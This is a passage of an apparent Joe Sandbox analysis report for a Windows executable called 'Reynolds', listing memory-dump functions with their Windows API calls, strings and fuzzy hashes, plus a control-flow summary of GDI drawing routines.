                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                                                      • API String ID: 0-572801152
                                                                                                      • Opcode ID: 5c1a4e62a646acb0bd1b5f4cc6a62ef7cbaeb95efe67bf12c35b99f614103513
                                                                                                      • Instruction ID: c24ee67ba1476bc8e886a272a4bc1a7378ae359b5b12dec57a2e9c9a2f498006
                                                                                                      • Opcode Fuzzy Hash: 5c1a4e62a646acb0bd1b5f4cc6a62ef7cbaeb95efe67bf12c35b99f614103513
                                                                                                      • Instruction Fuzzy Hash: F2E1C232A09B82E6EB11EF65E4402BDB7B0FB48798F824276DA4D47764DF38D546C710
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                      • String ID: SCRIPT
                                                                                                      • API String ID: 3051347437-3967369404
                                                                                                      • Opcode ID: d5206061f2b3ac5e17ee2dd1b5fd8c27282f55e584baf03c5003c8e6f72eae5e
                                                                                                      • Instruction ID: 8aba8078db4cb20ac2752f42874cfc680bb0b370f9c23b6be683e3c900c3a01c
                                                                                                      • Opcode Fuzzy Hash: d5206061f2b3ac5e17ee2dd1b5fd8c27282f55e584baf03c5003c8e6f72eae5e
                                                                                                      • Instruction Fuzzy Hash: 6C219076709B41D2FB119B22E044A29A3B0FB89F88F455075DE8D43B24EF3CE846CB10
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CurrentInfoSystemVersionWow64
                                                                                                      • String ID:
                                                                                                      • API String ID: 1568231622-0
                                                                                                      • Opcode ID: 79e0420c2984852e5f59fe1e813506d9fafb4aaa62b9c0ac84c7f4c88eda00f4
                                                                                                      • Instruction ID: 487788463eba4a13e87d08e5760102b680482e76ba7f2a7a0f03182dc037cc9f
                                                                                                      • Opcode Fuzzy Hash: 79e0420c2984852e5f59fe1e813506d9fafb4aaa62b9c0ac84c7f4c88eda00f4
                                                                                                      • Instruction Fuzzy Hash: 5FC16322E4E283E6F6B6AB10FA50175A7B0AF21784FC740B9C44D426B5EE6CB503C371
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 1405656091-0
                                                                                                      • Opcode ID: 3e809ee0917d980967337eb290ae9f657cbcc700f628c2feb101ff6f2151edd5
                                                                                                      • Instruction ID: 239e156642d8c0bd3344ea2822476958bf29305d8f19fd9b2aa8f1353e840ddb
                                                                                                      • Opcode Fuzzy Hash: 3e809ee0917d980967337eb290ae9f657cbcc700f628c2feb101ff6f2151edd5
                                                                                                      • Instruction Fuzzy Hash: 0C810AB2F06246DBFB59AF34E9017B9A2B1EB54784F858035DA0D4EB95EF3CE4068710
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 1239891234-0
                                                                                                      • Opcode ID: c1a2dea820685187a1b1ee23aeb9defc365f229fa0d1b3730a4ebbe8088e0426
                                                                                                      • Instruction ID: 7065d97508e8754694e3288b5a9881a0bada89e85e3ea210a00e63c2ff9c4509
                                                                                                      • Opcode Fuzzy Hash: c1a2dea820685187a1b1ee23aeb9defc365f229fa0d1b3730a4ebbe8088e0426
                                                                                                      • Instruction Fuzzy Hash: DC318136609B81D5EB61DF25F8402AEB3B0FB88768F950139EA8D43B64DF38C546CB10
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$CriticalLeaveSection_errno
                                                                                                      • String ID: 5
                                                                                                      • API String ID: 385122646-2226203566
                                                                                                      • Opcode ID: b2576e0c4156d4cee7c5235f3e08cab4a40bce9c42adbac06b8c0189b8e48b67
                                                                                                      • Instruction ID: 172c21a49f91c4ccfa1bfc88918b24f7c6db50b87b7ab7c9fe56c4938f84719d
                                                                                                      • Opcode Fuzzy Hash: b2576e0c4156d4cee7c5235f3e08cab4a40bce9c42adbac06b8c0189b8e48b67
                                                                                                      • Instruction Fuzzy Hash: 8EA1CEB3614A708BEB26DF25E44976ABBA1F780BC4F404155DE8787B86DB39D8C1CB40
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _handle_error
                                                                                                      • String ID: !$VUUU$fmod
                                                                                                      • API String ID: 1757819995-2579133210
                                                                                                      • Opcode ID: 06f58ab4aaca2128c338277b14f38b089639c2a9de57a5825e67876a1165aa04
                                                                                                      • Instruction ID: f90ef0f84bd080922e0493f8234e5a3c8d19cf1ef7025acd6222b4253c86b2c5
                                                                                                      • Opcode Fuzzy Hash: 06f58ab4aaca2128c338277b14f38b089639c2a9de57a5825e67876a1165aa04
                                                                                                      • Instruction Fuzzy Hash: 0AB1E861A19FC4C5E6A39B34A4113B6F2A9AFAA390F51C332D95E35A74DF2CD4878700
                                                                                                      APIs
                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7AA132BF0
                                                                                                        • Part of subcall function 00007FF7AA12AF34: GetCurrentProcess.KERNEL32(00007FF7AA12B0A5), ref: 00007FF7AA12AF61
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                      • String ID: *$.$.
                                                                                                      • API String ID: 2518042432-2112782162
                                                                                                      • Opcode ID: 4bc727eecd12c05f0579dc3a47633661258e4e13a894efe955ef075ebd1ec7be
                                                                                                      • Instruction ID: a24c6458c1433ece61938416bde54e8f45eeea673e5b5cb9fa549467516d3c2b
                                                                                                      • Opcode Fuzzy Hash: 4bc727eecd12c05f0579dc3a47633661258e4e13a894efe955ef075ebd1ec7be
                                                                                                      • Instruction Fuzzy Hash: 9851ED62F16B55D0FB56EFA1E8402ADA2B4BB54BC8F968031CE2D17B94DE3CD0438320
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF7AA115AC3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                      • API String ID: 389471666-631824599
                                                                                                      • Opcode ID: 8c783dfea8ab590eafe6bbf95db9fdce1a8e48e032f2d75969754b32e98ee1d6
                                                                                                      • Instruction ID: a0dc7f4b4eb3090903b9eb0c34e3150067361f92e409b1e34fb6d05837137cfa
                                                                                                      • Opcode Fuzzy Hash: 8c783dfea8ab590eafe6bbf95db9fdce1a8e48e032f2d75969754b32e98ee1d6
                                                                                                      • Instruction Fuzzy Hash: BE116D3261AB42E7F746AB22E6503B9B3B0FB04359F854178C64D42A60EF3CE065C720
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                      • API String ID: 1646373207-706389432
                                                                                                      • Opcode ID: 611390e442789d7f1a85b3be52b1f784bcb310a5b9c9223f5d4e059c00c8c7d4
                                                                                                      • Instruction ID: 9f82120f5818c48ab102df149c984da56e52e73212029acc61a7bbb1c6ac15c0
                                                                                                      • Opcode Fuzzy Hash: 611390e442789d7f1a85b3be52b1f784bcb310a5b9c9223f5d4e059c00c8c7d4
                                                                                                      • Instruction Fuzzy Hash: 6AE04226A02E2993EE069F81BD6D2542BA0B759B81F801195858A02B73EB3C95DA8300
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                      • String ID:
                                                                                                      • API String ID: 1083639309-0
                                                                                                      • Opcode ID: b4230e9694d6db5a2454d9ccaa2f058036f57f1eebbf8966ac4aac68c055cdad
                                                                                                      • Instruction ID: a2904e292eb20577f9c779d114f59bf8480ab4d6e7d5a9f2252f8ca08378abf7
                                                                                                      • Opcode Fuzzy Hash: b4230e9694d6db5a2454d9ccaa2f058036f57f1eebbf8966ac4aac68c055cdad
                                                                                                      • Instruction Fuzzy Hash: A0418E22A1A682E1F712FB61E4841AEB370FB84784F864076EA4D53665EF7CD51BC710
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                      • String ID:
                                                                                                      • API String ID: 3429775523-0
                                                                                                      • Opcode ID: 788e580e6745dde0bf41f1c5252257a7cd520450013a93ceb3609c7d43dd0201
                                                                                                      • Instruction ID: 93c921e9ec19bf635cd984b0c22fe1409d1a517416e780b8cbe30e57e61e50de
                                                                                                      • Opcode Fuzzy Hash: 788e580e6745dde0bf41f1c5252257a7cd520450013a93ceb3609c7d43dd0201
                                                                                                      • Instruction Fuzzy Hash: 95014073628781DFE7108F20E4553AA73B0F75476EF410929E64986A98CB7DC159CB80
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFormatLastMessage
                                                                                                      • String ID:
                                                                                                      • API String ID: 3479602957-0
                                                                                                      • Opcode ID: 9b3400b2d7958dcf7bb5d83233e54855c88d8e6a6dc818cc5e4bd19195bd4ddd
                                                                                                      • Instruction ID: 3e6f4e7ee9cfdcfdc167f0722ed33309632e9c045535113cff09c1e707a96d7e
                                                                                                      • Opcode Fuzzy Hash: 9b3400b2d7958dcf7bb5d83233e54855c88d8e6a6dc818cc5e4bd19195bd4ddd
                                                                                                      • Instruction Fuzzy Hash: 55F0A472B0D642D1E720AB25F84066AE271FF88794F565134EB5D42BB5DE3CD4058B10
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HeapProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 54951025-0
                                                                                                      • Opcode ID: 240d552e835f2b25362e23fc86050fbc2e15662c94a0908d5121eb02f9075e07
                                                                                                      • Instruction ID: 60aa6b9399b3a4533e4f31941bfa576e3a2210bc3092d00b6c33efb414482ee1
                                                                                                      • Opcode Fuzzy Hash: 240d552e835f2b25362e23fc86050fbc2e15662c94a0908d5121eb02f9075e07
                                                                                                      • Instruction Fuzzy Hash: 9AB09221E0BB46E2FA0A3B11BC8621462B87F48714FDA41B9C00D40330DF2C21AA9720
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 487ac93962f4c08a726fa4f1cbcf22742163b5770d24f742e327d9c4be1ea4b1
                                                                                                      • Instruction ID: 4a53525fc8b06426f32589d2a1838febad3581f006234e2c9674238386616aac
                                                                                                      • Opcode Fuzzy Hash: 487ac93962f4c08a726fa4f1cbcf22742163b5770d24f742e327d9c4be1ea4b1
                                                                                                      • Instruction Fuzzy Hash: 7FF0447162A255DAFBA59F2CF842A2977A0E7483C0F908079DA8983B54DA3C91718F54
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8f6d893820d0fab81262624eeca4fcab017bbf27f8cb14a3bd45f903649d3583
                                                                                                      • Instruction ID: 4afbc207b78b3f023875a9dcae676b14cf65036feab0b95cdacbf454130c215c
                                                                                                      • Opcode Fuzzy Hash: 8f6d893820d0fab81262624eeca4fcab017bbf27f8cb14a3bd45f903649d3583
                                                                                                      • Instruction Fuzzy Hash: 82A001A190E81AF4F646AB02F850020A270EB50328BCA04B9E00D410B09E3CA4528324

                                                                                                      Control-flow Graph

                                                                                                      (Rendered graph not reproduced. Basic blocks 7ff7aa19f0c0-7ff7aa19f416; calls subroutines 7ff7aa19f418, 7ff7aa114aa8 and 7ff7aa114a64; APIs referenced in the graph: GetSysColor, SetTextColor, GetSysColorBrush, CreateSolidBrush, SetBkColor, SelectObject, InflateRect, FrameRect, DeleteObject, DrawFrameControl, FillRect, GetWindowLongW, SendMessageW, GetWindowTextW, DrawTextW, DrawFocusRect.)
                                                                                                      APIs
                                                                                                      • GetSysColor.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7AA1A198A,?,?,?,00007FF7AA13A2A5), ref: 00007FF7AA19F128
                                                                                                      • SetTextColor.GDI32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7AA1A198A,?,?,?,00007FF7AA13A2A5), ref: 00007FF7AA19F133
                                                                                                      • GetSysColorBrush.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7AA1A198A,?,?,?,00007FF7AA13A2A5), ref: 00007FF7AA19F14C
                                                                                                      • GetSysColor.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7AA1A198A,?,?,?,00007FF7AA13A2A5), ref: 00007FF7AA19F15E
                                                                                                      • SetBkColor.GDI32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7AA1A198A,?,?,?,00007FF7AA13A2A5), ref: 00007FF7AA19F17F
                                                                                                      • SelectObject.GDI32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7AA1A198A,?,?,?,00007FF7AA13A2A5), ref: 00007FF7AA19F18E
                                                                                                      • InflateRect.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7AA1A198A,?,?,?,00007FF7AA13A2A5), ref: 00007FF7AA19F1B3
                                                                                                      • GetSysColor.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7AA1A198A,?,?,?,00007FF7AA13A2A5), ref: 00007FF7AA19F1BE
                                                                                                      • CreateSolidBrush.GDI32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7AA1A198A,?,?,?,00007FF7AA13A2A5), ref: 00007FF7AA19F1C6
                                                                                                      • FrameRect.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7AA1A198A,?,?,?,00007FF7AA13A2A5), ref: 00007FF7AA19F1D9
                                                                                                      • DeleteObject.GDI32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7AA1A198A,?,?,?,00007FF7AA13A2A5), ref: 00007FF7AA19F1E2
                                                                                                      • InflateRect.USER32(?,?,?,?,?,00000000,?,?,?,?,?,00007FF7AA1A198A,?,?,?,00007FF7AA13A2A5), ref: 00007FF7AA19F237
                                                                                                      • FillRect.USER32(?,?,?,?,?,00000000), ref: 00007FF7AA19F267
                                                                                                      • GetWindowLongW.USER32(?,?,?,?,?,00000000), ref: 00007FF7AA19F286
                                                                                                      • SendMessageW.USER32(?,?,?,?,?,00000000), ref: 00007FF7AA19F2D3
                                                                                                        • Part of subcall function 00007FF7AA19F418: GetSysColor.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA19F0F0), ref: 00007FF7AA19F45F
